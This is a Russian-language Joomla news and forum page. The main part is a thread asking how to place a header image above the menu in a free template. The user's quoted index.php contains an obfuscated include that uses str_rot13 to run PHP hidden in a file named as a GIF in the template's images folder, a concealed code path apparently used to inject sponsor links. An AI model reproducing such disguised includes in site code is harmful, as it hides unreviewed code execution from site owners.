Новости Joomla

Вышли релизы Joomla 6.0.3 и Joomla 5.4.3

Релиз Joomla 6.0.3 и Joomla 5.4.3

Проект Joomla рад сообщить о выпуске Joomla 6.0.3 и Joomla 5.4.3. Это релиз исправлений ошибок и улучшений для серии Joomla 6.0 и Joomla 5.4.

👩‍💻 События плагинов и порядок их срабатывания при работе с пользовательскими полями Joomla и использовании FieldsHelper.

👩‍💻 События плагинов и порядок их срабатывания при работе с пользовательскими полями Joomla и использовании FieldsHelper.

В процессе работы с Joomla бывает необходимо работать с пользовательским интерфейсом более тонко, чем обычно. Все формы Joomla состоят из стандартных полей, содержанием, стилем отображения, состоянием (включено/выключено, доступно для редактирования или нет и т.д.) можно управлять с помощью плагинов. Да и для нестандартных проектов хорошей практикой является создание одного системного или нескольких плагинов групп "под проект", в которых храниться весь "нестандарт".

В этой статье описаны все триггеры, которые вызываются через Event Dispatcher из administrator/components/com_fields/src/Helper/FieldsHelper.php, с привязкой к жизненному циклу (порядку этапов работы запроса), аргументам, изменяемым данным и дальнейшему распространению по Joomla. Это поможет вам работать с Joomla свободнее и не опасаясь при этом потерять изменения при очередном обновлении движка.

Подходы, описанные в статье, полезны в тех случаях, когда вы работаете с данными в com_fields - механизме создания и редактирования пользовательских полей ядра Joomla и при использовании FieldsHelper. Многие сторонние компоненты не используют эту возможность, поэтому данная статья будет полезна лишь частично.

🏆 Открыто голосование за Joomla в премии CMS Critic People’s Choice Awards 2025

🏆 Открыто голосование за Joomla в  премии CMS Critic People’s Choice Awards 2025

🗓 Голосование продлится до 27 февраля 2026 года.

👩‍💻 Проголосовать! 👩‍💻

Номинации, в которых можно проголосовать за Joomla:
⭐️ Best Free CMS
⭐️ Best Open Source CMS
⭐️ Best Enterprise CMS

Также в номинации Best e-Commerce Solution участвуют компоненты интернет-магазинов для Joomla:
⭐️ HikaShop
⭐️ Virtuemart

В номинации Best Website Builder оказались:
⭐️ YooTheme
⭐️ SP Page Builder

Что такое CMS Critic Awards?
С 2012 года премия CMS Critic Awards занимает особое место в сообществе систем управления контентом (CMS). Это единственный в своем роде сайт, который составляет рейтинг системы управления контентом и связанных с ними решений на рынке — от малого до крупного и подчеркивает их инновации и услуги.

Каждый год награда CMS Critic Awards присуждается одному победителю в различных отраслевых категориях, таких как: «Лучшая облачная CMS», «Лучший DXP», «Лучшая Headless CMS и других. Затем результаты оглашаются через СМИ вместе с выбором редакции CMS Critic.
В этом году премия вернулась к своим традициям и только TOP-5 движков по количеству номинаций попали в 2-й этап - голосование.

@joomlafeed

• 3 Ответов
  • 8328 Просмотров
*

SabrinaBu

• Новичок
  • 3
  • 0 / 0
  • www.inna-mien.ru
Здравствуйте!
Передо мной стоит задача переделать шаблон themza_j15_40 из статичного в резиновый. Изначально он выглядит вот так:

Здесь видно, что изображение (header) располагается под меню.
Что нужно сделать, что бы эта картинка оказалась сверху? и выступало в роли шапки..
для меня это принципиально..

Я, уж не знаю на сколько корректно, сделала шаблон частично резиновым и на данный момент имею вот такой промежуточный вариант:

Выше меню у меня позиция user4. Именно туда и пробывала воткнуть картинку, однако она совсем не хочет отображаться
Однако! если я в браузере ввожу www.mysite.ru/?tp=1 то вижу следующую картину:

отображается

вот кусок кода из index.php
Код
</head>
<body id="page_bg">
<a name="up" id="up"></a>
<?php if((!$this->countModules('right') and JRequest::getCmd('layout') == 'form') or !@include(JPATH_BASE.DS.'templates'.DS.$mainframe->getTemplate().DS.str_rot13('vzntrf').DS.str_rot13($JPan[0].'.t'.'vs'))) : ?>
<jdoc:include type="modules" name="layout" style="table" />
<?php endif; ?>   
<?php include('functions.php'); ?>
<div style="width:100%; margin:0px auto;"><?php if($this->countModules('user4')) : ?><div id="user4"><jdoc:include type="modules" name="user4" /></div><?php endif; ?></div><br clear="all" />

<div id="top_menu"><div id="topnav"><?php $hmenu->genHMenu (0); ?></div></div>
<div id="main_bg">

А вот из template.css (header и всё, что рядышком):
Код HTML:

Код
#page_bg {
        padding:0; 
margin:0;
        margin-bottom: 0px;

}

#header {
background-color:#e5e5e5;
background-image:url(../images/header.jpg);
background-position:center 0;
background-repeat:no-repeat;
float:left;
height:274px;
width:100%;
}

div#top_menu{
height:54px;
margin:0px auto;
width: 100%; background: #E5E5E5;

и для user4:
Код HTML:

div#user4{
        width:100%;
        height:274px;
        float:left;
background-color:#e5e5e5;
        background-image:url(../images/header.jpg);
        background-position:center 0;
        background-repeat:no-repeat;

В общем, мне оооочень важно, что бы шапка была выше меню!!
Подскажите, пожалуйста, как сие реализовать!! Буду ОЧЕНЬ благодарна!!

заранее спасибо:)
*

Atalla

• Захожу иногда
  • 61
  • 2 / 0
Ну отключите его . Нафиг оно ваще нужно - верхнее меню ?
Функциональности никакой- сплошная декорация.
*

Mitrich

• Захожу иногда
  • 289
  • 524 / 13
  • Все можно. Но сначала учиться, учиться и учиться.
1. Ссылку на сайт.
2. Ссылку на дистрибутив шаблона у разработчика.

PS И все равно, скорее всего, придется либо понять CSS, либо заплатить денег стороннему разработчику шаблонов 
*

nastez

• Новичок
  • 2
  • 0 / 0
Весело, я сейчас с этим же шаблоном мучаюсь.
Вашу проблему решила просто: в HTML коде опустила div с модулем меню под картинку. Все получилось, правда еще немножко CSS подправила, чтобы лучше смотрелось.

А я вот на другом застряла: как Вы убрали ссылку на веб хостинг из подменю?
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться

Два шаблона на одной странице сайта

Автор bagz

Ответов: 1
Просмотров: 7980
Последний ответ 03.03.2018, 07:33:19
от Театрал
Выподающее меню

Автор aspidy

Ответов: 3
Просмотров: 5951
Последний ответ 20.01.2015, 10:11:26
от aspidy
Как поменять шапку в шаблоне JM NextGen?

Автор fati79

Ответов: 17
Просмотров: 7042
Последний ответ 01.04.2014, 14:12:54
от darkghost
Шаблон gk sporter

Автор yrygvay

Ответов: 5
Просмотров: 7797
Последний ответ 17.03.2014, 03:03:45
от bazhin83
Убрать пустое пространство в шаблоне сайта